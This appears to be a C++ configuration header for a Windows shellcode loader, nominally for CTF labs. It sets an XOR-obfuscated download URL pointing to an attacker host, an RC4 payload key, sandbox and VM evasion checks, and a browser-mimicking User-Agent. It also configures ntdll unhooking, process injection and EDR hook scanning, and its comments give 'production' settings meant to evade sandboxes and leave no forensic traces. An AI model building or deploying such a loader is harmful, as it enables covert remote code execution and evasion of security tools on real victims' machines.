#pragma once

#include <array>
#include <cstdint>
#include <string_view>

namespace app::config {

// ===========================================================================
//  LOADER BEHAVIOUR SWITCHES
// ===========================================================================
//
//  IMPORTANT: CTF boxes are VMs with low specs (1-2 CPUs, ~4 GB RAM,
//  generic username, hypervisor CPUID string). The sandbox gate WILL fire
//  with a score of 2-4 and the loader will instantly ExitProcess(0) before
//  it ever touches the network. This is why you see ZERO HTTP hits on your
//  listener when these checks are enabled.
//
//  CTF / LAB        →  set all three to the values shown below
//  PRODUCTION       →  see README.md for recommended production settings
// ===========================================================================

//  Jitter delay (30-120 s sleep + 3x 1-5 s micro-delays).
//
//  CTF/lab:    false  — instant execution, no waiting.
//  Production: true   — defeats automated sandbox detonation (most sandboxes
//                       time out after ~30 s).
inline constexpr bool kEnableJitter = false;

//  Environment validation (VM / debugger / sandbox detection).
//
//  Checks:     CPUID hypervisor string, CPU<2, RAM<2 GB, uptime<1 h,
//              username contains admin/user/test/student/sandbox/vm/virtual,
//              resolution<1024x768.
//  Abort rule: score >= 2 (at least TWO checks must fire).
//
//  CTF/lab:    false  — the target IS a VM with low specs; the gate kills
//                       the loader immediately. This is the #1 reason for
//                       "silent failure / zero HTTP hits".
//  Production: true   — real workstations (4+ CPUs, 8+ GB RAM, domain user,
//                       bare metal) pass the gate. Only sandboxes abort.
inline constexpr bool kEnableEvasionChecks = false;

//  Debug logging to %TEMP%\loader_debug.txt.
//
//  When enabled, every phase writes a line to the log so you can diagnose
//  exactly where the loader died (jitter? evasion? URL? HTTP? RC4? inject?).
//
//  CTF/lab:    true   — invaluable for troubleshooting.
//  Production: false  — leaves forensic traces. Disable for OPSEC.
inline constexpr bool kEnableDebugLog = true;

// ===========================================================================
//  OPERATIONAL LOADER CONFIGURATION
// ===========================================================================

// XOR-obfuscated URL (generated by url_obfuscator.py).
// Example: python3 url_obfuscator.py http://10.10.X.X/data.enc 0x55 --c-init
inline constexpr std::array<std::uint8_t, 28> kObfuscatedUrl = {
    0x3d, 0x21, 0x21, 0x25, 0x6f, 0x7a, 0x7a, 0x64,
    0x65, 0x7b, 0x64, 0x65, 0x7b, 0x64, 0x61, 0x7b,
    0x64, 0x60, 0x6d, 0x7a, 0x31, 0x34, 0x21, 0x34,
    0x7b, 0x30, 0x3b, 0x36
};
inline constexpr std::uint8_t kUrlXorKey = 0x55;

// RC4 key for payload decryption. Must match the key used with rc4.py.
// Proven working key: "windows.h"
inline constexpr char kRc4Key[] = "windows.h";

// User-Agent for the HTTP download. Chrome 120 is used to blend with
// normal browser traffic.
inline constexpr std::string_view kUserAgent =
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36";

// Path to the clean on-disk ntdll.dll used for unhooking and syscall
// number extraction. This file is mapped read-only.
inline constexpr wchar_t kReferenceNtdllPath[] = L"C:\\Windows\\System32\\ntdll.dll";

// Process to inject into.  Empty string = skip injection and execute the
// shellcode directly in the current process (old loader behaviour).
//
//  L""                 → direct execution, runs as CURRENT user (e.g. Administrator)
//  L"explorer.exe"     → inject into explorer, stealthy but runs as explorer's user
//  L"notepad.exe"      → spawn notepad suspended, inject, resume
//
// IMPORTANT: If you inject into a process owned by a different user
// (e.g., explorer.exe running as a low-priv service account), the beacon
// will come back as THAT user, not as the user who ran the loader.
// Use empty string when you want to preserve your current privileges.
inline constexpr wchar_t kInjectTargetProcess[] = L"";

// ===========================================================================
//  RESEARCH HARNESS CONFIGURATION (diagnostic tool, not the loader)
// ===========================================================================

// Probe URL used ONLY by research_harness.exe (NOT the loader).
//
// The research harness sends one HTTP GET to this URL via raw WinSock
// to confirm the target can reach your attacker machine. If this probe
// succeeds, you know the loader's download will also work.
//
// Before running the harness, change this to your actual Kali IP and
// start a listener there (e.g. python3 -m http.server 8080).
//
// Example: "http://10.10.X.X:8080/health"
// Default localhost will fail unless something is listening on the target.
inline constexpr std::string_view kSampleUrl = "http://127.0.0.1:8080/health";

// Ntdll exports that the research harness scans for EDR hooks.
inline constexpr std::array<std::string_view, 6> kExportsToInspect = {
    "NtAllocateVirtualMemory",
    "NtProtectVirtualMemory",
    "NtQuerySystemInformation",
    "NtReadVirtualMemory",
    "VirtualAlloc",
    "VirtualProtect",
};

} // namespace app::config
